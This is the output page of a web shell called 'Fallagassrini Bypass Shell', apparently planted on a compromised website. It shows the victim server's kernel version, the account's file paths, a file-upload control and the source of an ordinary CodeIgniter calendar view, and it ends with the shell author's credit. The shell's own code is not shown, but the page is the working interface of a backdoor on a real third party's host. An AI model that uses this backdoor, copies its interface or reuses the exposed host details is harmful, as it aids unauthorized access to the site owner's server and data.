? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/oscarerp.com/application/views/calendar/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/oscarerp.com/application/views/calendar/single_event.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
?>


<div class="icons_main">
   <div  class="icons">
        <img src="<?=base_url()?>assets/images/back.png" title="Back" class="clickimage" onclick="viewdata('calendar','viewincalendarsearch','searchcalendar','view_event','<?= $_SESSION['pagenum']; ?>')" alt="Back" align = "center" width="32" height="32"  />
    </div>
     <div class="icons_caption">
        <h4>  Event Details</h4>
     </div>
</div>


    <?php
    $attributes = array('class' => 'search_form', 'id' => 'validateform', 'name' => 'validateform');
    echo form_open('', $attributes);
    ?>

   <div class="grid_6">
    <div class="box">
        <div class="header">
        </div>
         <div class="content no-padding">
                
               <div class="section _100">
                <label>Start date</label>
                <div class="single_page"> 
                    <?=$this->mastermodel->convertdatenormalformat($event->calendar_start_date);?>
                </div>
            </div>
               <div class="section _100">
                <label>End date</label>
                <div class="single_page"> 
                    <?=$this->mastermodel->convertdatenormalformat($event->calendar_end_date);?>
                </div>
            </div>
             <div class="section _100">
                <label>Title</label>
                <div class="single_page"> 
                   <?=$event->calendar_title;?>
                </div>
            </div>
             <div class="section _100">
                <label>End date</label>
                <div class="single_page"> 
                       <?=$event->calendar_description;?>
            </div>
           

           
            <?php echo form_close();?>
      </div>
    </div>
</div>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net